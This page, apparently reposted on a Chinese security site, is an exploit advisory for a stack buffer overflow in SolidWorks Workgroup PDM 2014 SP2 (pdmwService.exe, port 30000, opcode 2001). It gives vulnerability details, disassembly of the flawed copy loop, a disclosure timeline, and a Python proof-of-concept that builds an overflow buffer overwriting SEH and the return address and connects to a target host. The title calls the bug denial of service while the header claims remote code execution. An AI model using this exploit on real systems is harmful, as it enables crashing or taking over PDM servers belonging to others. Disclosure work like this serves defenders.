首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service
来源:mshetta |at| live |dot| com 作者:Shetta 发布时间:2014-02-20  
'''
# Exploit Title: SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 Remote Code Execution Vulnerability
# Date: 2-18-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm
# Tested on: Windows 7
#Vulnerability type: Remote Code Execution
#Vulnerable file: pdmwService.exe
#PORT: 30000
  
  
---------------------------------------------------------------------------------------------------------
Software Description:
  
SolidWorks Workgroup PDM is a PDM tool that allows SolidWorks users operating in teams of 10 members or less to work on designs concurrently. With SolidWorks PDM Workgroup, designers can search, revise, and vault CAD data while maintaining an accurate design history.
  
  
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
  
A stack buffer overflow occurs when copying a user supplied input to a fixed size stack buffer without boundary check leading to overwrite the SEH and the return address.
The copying procedure stops when a null word is found and no size check is proceeded.
  
  
-----------------------------------------------------------------------------------------------------------
Vulnerable Code:
EAX contains the User supplied data.
  
004E0C50 |> /0FB708 /MOVZX ECX,WORD PTR DS:[EAX] ; Copying To Fixed Size Buffer
004E0C53 |. |66:890C02 |MOV WORD PTR DS:[EDX+EAX],CX
004E0C57 |. |83C0 02 |ADD EAX,2
004E0C5A |. |66:85C9 |TEST CX,CX
004E0C5D |.^\75 F1 \JNZ SHORT 004E0C50 ; pdmwServ.004E0C50
  
  
------------------------------------------------------------------------------------------------------------
PoC:
  
The PoC attacks both the SEH and Return address, overwriting them with 0x00401000.
To demonstrate the vulnerability easily SEH will be used to take control of EIP.
  
The exception will be triggered by 0x004B9CB6 Because another read attempt is made that fails because of read time out error. This behavior is intended by the attacker to trigger the exception.
  
------------------------------------------------------------------------------------------------------------
Further attack vectors:
  
Opcodes 2002 and 2003 are vulnerable too.
  
------------------------------------------------------------------------------------------------------------
Disclosure timeline:
  
12/15/2013 - Vendor notified and no response.
2/18/2014 - Public disclosure
'''
  
#!/usr/bin/env python
    
import socket
  
Shell="A"*2060
EIP="\x00\x10\x40\x00"
buff="\xD1\x07\x00\x00" + "\x1C\x08\x00\x00" + Shell + EIP + "\x90\x90\x90\x90\x90\x90\x90\x90" + EIP
          #OpCode                        Size of the next data                                   Junk
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.3", 30000))

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Catia V5-6R2013 "CATV5_AllAppl
·Audiotran PLS File Stack Buffe
·WRT120N 1.0.0.7 Stack Overflow
·MediaWiki Thumb.php Remote Com
·Linksys Worm Remote Root
·WRT120N 1.0.0.7 Stack Overflow
·Oracle Forms and Reports Remot
·VideoCharge Studio 2.12.3.685
·Eudora Qualcomm WorldMail 9.0.
·Catia V5-6R2013 "CATV5_Backbon
·Linksys E-series Unauthenticat
·Dexter (CasinoLoader) SQL Inje
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved